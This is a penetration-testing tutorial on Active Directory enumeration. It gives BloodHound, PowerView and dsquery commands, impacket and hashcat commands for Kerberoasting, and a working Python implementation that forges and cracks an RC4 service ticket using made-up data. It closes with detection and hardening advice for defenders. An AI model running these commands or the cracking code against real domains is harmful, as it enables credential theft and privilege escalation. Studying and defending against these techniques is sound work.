Active Directory is the authentication and authorization backbone of most enterprise Windows environments. It is also a goldmine of information that is readable by any authenticated domain user, including a low-privilege account obtained through phishing. Knowing what is enumerable without elevated rights is fundamental to penetration testing and, just as much, to understanding what your own domain exposes.
Why AD Recon Matters
By design, domain users can query a significant portion of Active Directory. This is required for normal operations — computers need to find printers, users need to look up colleagues, applications need to resolve service accounts. The same queries that enable normal functionality give a foothold account the information needed to identify privilege escalation paths, map trust relationships, and find high-value targets.
BloodHound: The Standard
BloodHound visualizes Active Directory as a graph — nodes are users, computers, and groups; edges are relationships and permissions. Its key capability is finding attack paths: “what series of hops gets this low-privilege user to Domain Admin?”
Data collection is done by SharpHound (the C# ingestor, run from a domain-joined Windows host) or by bloodhound-python, which runs from a Linux box and talks to the domain controller and endpoints over LDAP, SMB and RPC, so nothing has to be dropped on a domain host:
# Python collector from Linux, authenticated as domain user
bloodhound-python -u username -p password -d domain.local -dc dc01.domain.local -c All
SharpHound from a Windows foothold:
.\SharpHound.exe -c All --zipfilename output.zip
Import the resulting ZIP into BloodHound’s Neo4j-backed interface and run pre-built queries:
- “Find all Domain Admins”
- “Shortest path to Domain Admin from owned principals”
- “Find workstations where Domain Admins have sessions”
The last one is particularly valuable: if a Domain Admin has an interactive session on a workstation you can become local admin on, their credential material is sitting in that machine's LSASS memory, and you can potentially obtain it without ever touching a domain controller.
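To make the "attack path" idea concrete, here is an added example (my code, not BloodHound's or SharpHound's) that builds a tiny constructed graph with BloodHound's edge semantics (MemberOf, AdminTo, HasSession) and answers the three queries above by plain breadth-first search. All principal and host names are made up.

```python
from collections import deque

# Constructed toy graph, not collected data: node -> [(edge_type, target)].
# Edge directions follow BloodHound: user/group -MemberOf-> group,
# principal -AdminTo-> computer, computer -HasSession-> user.
DA = "DOMAIN ADMINS@DOMAIN.LOCAL"
GRAPH = {
    "alice@DOMAIN.LOCAL":     [("MemberOf", "HELPDESK@DOMAIN.LOCAL")],
    "HELPDESK@DOMAIN.LOCAL":  [("AdminTo", "WS01.DOMAIN.LOCAL")],
    "WS01.DOMAIN.LOCAL":      [("HasSession", "bob@DOMAIN.LOCAL")],
    "bob@DOMAIN.LOCAL":       [("MemberOf", DA)],
    "erin@DOMAIN.LOCAL":      [("AdminTo", "SRV02.DOMAIN.LOCAL")],
    "SRV02.DOMAIN.LOCAL":     [("HasSession", "dave@DOMAIN.LOCAL")],
    "dave@DOMAIN.LOCAL":      [("MemberOf", "TIER0-OPS@DOMAIN.LOCAL")],
    "TIER0-OPS@DOMAIN.LOCAL": [("MemberOf", DA)],        # nested privileged group
    "carol@DOMAIN.LOCAL":     [("MemberOf", "SALES@DOMAIN.LOCAL")],
    "SALES@DOMAIN.LOCAL":     [],
    DA:                       [],
}


def members_of(graph, group):
    """'Find all Domain Admins': direct and nested members, walking MemberOf edges backwards."""
    members, todo = set(), [group]
    while todo:
        g = todo.pop()
        for src, edges in graph.items():
            if ("MemberOf", g) in edges and src not in members:
                members.add(src)
                todo.append(src)        # src may itself be a group: recurse into it
    return members


def hosts_with_sessions_of(graph, group):
    """'Find workstations where Domain Admins have sessions': hosts with a HasSession edge to any member."""
    targets = members_of(graph, group)
    return {host for host, edges in graph.items()
            for kind, dst in edges if kind == "HasSession" and dst in targets}


def shortest_path(graph, start, target):
    """'Shortest path to Domain Admin': BFS over every edge type, fewest hops wins. None if unreachable."""
    parent = {start: None}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == target:
            path = []
            while parent[node] is not None:
                prev, edge = parent[node]
                path.append((prev, edge, node))
                node = prev
            return path[::-1]
        for edge, nxt in graph.get(node, []):
            if nxt not in parent:
                parent[nxt] = (node, edge)
                queue.append(nxt)
    return None


def paths_from_owned(graph, owned, target=DA):
    """Run the shortest-path query from every owned principal, as BloodHound does for 'owned' nodes."""
    return {p: shortest_path(graph, p, target) for p in owned}


if __name__ == "__main__":
    for owned, path in paths_from_owned(GRAPH, ["alice@DOMAIN.LOCAL", "carol@DOMAIN.LOCAL"]).items():
        print(owned, "->", " -> ".join(f"{a} [{e}] {b}" for a, e, b in path) if path else "no path")
    print("DA sessions on:", sorted(hosts_with_sessions_of(GRAPH, DA)))
```

Alice reaches Domain Admins in four hops without ever being granted anything on a DC: group membership gives her local admin on WS01, WS01 holds bob's session, and bob is a Domain Admin. That chain is exactly what the "sessions on workstations" query surfaces, and it is invisible to an audit that only looks at group membership.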
PowerView / LDAP Queries
PowerView is a PowerShell module for AD enumeration that wraps LDAP and Win32 API calls. Key functions:
# Import
Import-Module .\PowerView.ps1
# Domain and domain controller basics
Get-Domain
Get-DomainController
# Every user, with the fields worth reading first (descriptions leak surprisingly often)
Get-DomainUser | select samaccountname, description, memberof
Get-DomainUser -SPN # accounts with SPNs registered (Kerberoastable)
# Privileged group membership; -Recurse expands nested groups
Get-DomainGroup "Domain Admins" | select member
Get-DomainGroupMember "Domain Admins" -Recurse
# Computers; operating system and last logon flag legacy or stale hosts
Get-DomainComputer | select name, operatingsystem, lastlogon
# GPOs and the SYSVOL paths that hold their settings
Get-DomainGPO | select displayname, gpcfilesyspath
# Machines where members of Domain Admins currently have sessions
Find-DomainUserLocation -UserGroupIdentity "Domain Admins"
Kerberoasting
Service accounts in AD often have Service Principal Names (SPNs) registered. Any domain user can request a Kerberos service ticket (TGS) for any SPN, and the ticket the KDC returns is encrypted with a key derived from the service account's password; for RC4 (encryption type 23) that key is simply the account's NT hash. Nothing stops you from saving the ticket and guessing passwords offline: each candidate password is turned into a key, the ticket is decrypted with it, and the result is checked against the ticket's own integrity checksum, with no further contact with the DC and no lockout.
# With impacket (from Linux): request a ticket for every account that has an SPN
GetUserSPNs.py domain.local/username:password -dc-ip 10.X.X.X -request -outputfile kerberoast_hashes.txt
# Crack offline; mode 13100 is the RC4 (etype 23) TGS-REP format. Tickets from accounts that only
# hold AES keys come out as etype 17 or 18 (hashcat 19600 / 19700) and crack far more slowly.
hashcat -a 0 -m 13100 kerberoast_hashes.txt rockyou.txt
Service accounts often have weak passwords set years ago and never rotated, and because they are ordinary user accounts (unlike group Managed Service Accounts, whose passwords are long, random and rotated automatically) they are crackable. Kerberoasting against such accounts is one of the most reliable paths from domain user to elevated credentials.
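The offline step is the whole point of the attack, so here is an added example (my code, not impacket's or hashcat's) that walks through it end to end for RC4-HMAC (etype 23): it plays the KDC for a constructed service account, emits the ticket in the `$krb5tgs$23$` layout GetUserSPNs.py writes, and then runs the same guess loop hashcat mode 13100 implements. The account name, SPN, password, wordlist and ticket body are all made up; a real ticket body is an ASN.1 EncTicketPart, which changes nothing about the crack.

```python
import hashlib
import hmac
import os
import struct

# Added example, not the page's or impacket's code. Pure-Python MD4 because OpenSSL 3
# builds frequently leave it out of hashlib.
M32 = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & M32
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    r3_order = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        A, B, C, D = a, b, c, d
        for i in range(16):                                   # round 1
            A = rotl((A + F(B, C, D) + X[i]) & M32, (3, 7, 11, 19)[i % 4])
            A, B, C, D = D, A, B, C
        for i in range(16):                                   # round 2
            A = rotl((A + G(B, C, D) + X[(i % 4) * 4 + i // 4] + 0x5A827999) & M32, (3, 5, 9, 13)[i % 4])
            A, B, C, D = D, A, B, C
        for i, k in enumerate(r3_order):                      # round 3
            A = rotl((A + H(B, C, D) + X[k] + 0x6ED9EBA1) & M32, (3, 9, 11, 15)[i % 4])
            A, B, C, D = D, A, B, C
        a, b, c, d = (a + A) & M32, (b + B) & M32, (c + C) & M32, (d + D) & M32
    return struct.pack("<4I", a, b, c, d)


def ntlm_hash(password: str) -> bytes:
    """The RC4-HMAC Kerberos key is MD4(UTF-16LE(password)), i.e. the account's NT hash."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    S, j = list(range(256)), 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


KEY_USAGE_TICKET = 2     # key usage number for the encrypted part of a service ticket


def hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.md5).digest()


def rc4_hmac_encrypt(key: bytes, plaintext: bytes, usage: int = KEY_USAGE_TICKET, confounder: bytes = None) -> bytes:
    """RFC 4757 RC4-HMAC: output = HMAC-MD5(K1, confounder||data) || RC4(K3, confounder||data)."""
    k1 = hmac_md5(key, struct.pack("<I", usage))
    body = (confounder or os.urandom(8)) + plaintext
    checksum = hmac_md5(k1, body)
    k3 = hmac_md5(k1, checksum)
    return checksum + rc4(k3, body)


def hashcat_13100(user: str, realm: str, spn: str, edata: bytes) -> str:
    """Same layout GetUserSPNs.py writes: $krb5tgs$23$*user$REALM$spn*$checksum$ciphertext."""
    return f"$krb5tgs$23$*{user}${realm}${spn}*${edata[:16].hex()}${edata[16:].hex()}"


def crack_13100(line: str, wordlist, usage: int = KEY_USAGE_TICKET):
    """Offline guess loop: derive keys from each candidate, decrypt, verify the ticket's own checksum."""
    _, checksum_hex, cipher_hex = line.rsplit("$", 2)
    checksum, cipher = bytes.fromhex(checksum_hex), bytes.fromhex(cipher_hex)
    for pw in wordlist:
        k1 = hmac_md5(ntlm_hash(pw), struct.pack("<I", usage))
        plaintext = rc4(hmac_md5(k1, checksum), cipher)
        if hmac.compare_digest(hmac_md5(k1, plaintext), checksum):
            return pw          # the checksum only verifies under the right key
    return None


# Constructed data: fake service account, placeholder ticket body, tiny wordlist.
SERVICE_PASSWORD = "Summer2019!"
TICKET = rc4_hmac_encrypt(ntlm_hash(SERVICE_PASSWORD), b"EncTicketPart placeholder for svc_sql (constructed)")
HASH_LINE = hashcat_13100("svc_sql", "DOMAIN.LOCAL", "MSSQLSvc/sql01.domain.local:1433", TICKET)
WORDLIST = ["Password1", "Welcome1", "Summer2019!", "hunter2"]

if __name__ == "__main__":
    print(HASH_LINE)
    print("cracked:", crack_13100(HASH_LINE, WORDLIST))
```

Two things worth noticing. The verifier inside the loop is the ticket's own HMAC, so no oracle is needed: a wrong guess fails locally and the DC never hears about it, which is why account lockout does nothing here. And the per-guess cost is one MD4 plus three MD5-HMACs and an RC4 pass, which is why RC4 tickets fall so fast; AES tickets cost thousands of PBKDF2 iterations per guess, which is the practical reason to disable RC4 for service accounts.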
LDAP Queries Without Tools
If you can't run tooling, the built-in directory command-line tools on a domain-joined machine work. Note that dsquery/dsget are part of the RSAT AD DS tools, so they are present on servers with that feature installed but not on a stock workstation; where they are missing, PowerShell's built-in [adsisearcher] type accelerator runs the same LDAP filters without any download.
# List all users (default result cap is 100; -limit 0 returns everything)
dsquery user -limit 0
# Members of Domain Admins
dsquery group -name "Domain Admins" | dsget group -members
# All computer objects
dsquery computer -limit 0
# Raw LDAP filter (dsquery * takes an arbitrary filter): user objects whose description mentions a password
dsquery * -filter "(&(objectClass=user)(description=*pass*))" -attr sAMAccountName description -limit 0
The description filter catches a surprisingly common finding: service account passwords stored in the AD description field by administrators who found it convenient. The description attribute is readable by every authenticated user, so it is effectively public within the domain.
What Defenders Should Know
Most of this enumeration goes to the domain controllers over LDAP, and the session and local-group collection that SharpHound adds on top touches every computer in scope over SMB and RPC, so both the DCs and the endpoints see it. Be aware that DCs do not log LDAP searches by default: the 1644 expensive-search event only appears once the Field Engineering diagnostic level is raised, and even then only for queries over the configured thresholds, so in practice BloodHound collection is usually caught by EDR on the collecting host, by network sensors watching one client open LDAP and SMB to hundreds of machines, or by honeypot accounts and SPNs that nothing legitimate should ever touch. Kerberoasting has its own clean signal: Event ID 4769 (a Kerberos service ticket was requested) on the DC, where one principal requesting tickets for many different service accounts in a short window, often with encryption type 0x17 (RC4) in a domain that otherwise uses AES, is the classic pattern. Defenders who understand what attack-path enumeration looks like can build detections around it.
Regularly audit what's exposed: service accounts with SPNs and weak or never-rotated passwords (or move them to group Managed Service Accounts, whose passwords are long, random and rotated automatically), users in privileged groups who shouldn't be, accounts with AdminCount=1 that are no longer in a protected group (SDProp sets the flag but never clears it, so these keep a restricted ACL and are easy to overlook), description fields holding passwords, and stale computer objects for long-decommissioned machines, which remain valid accounts that anyone holding the old machine credentials can still use.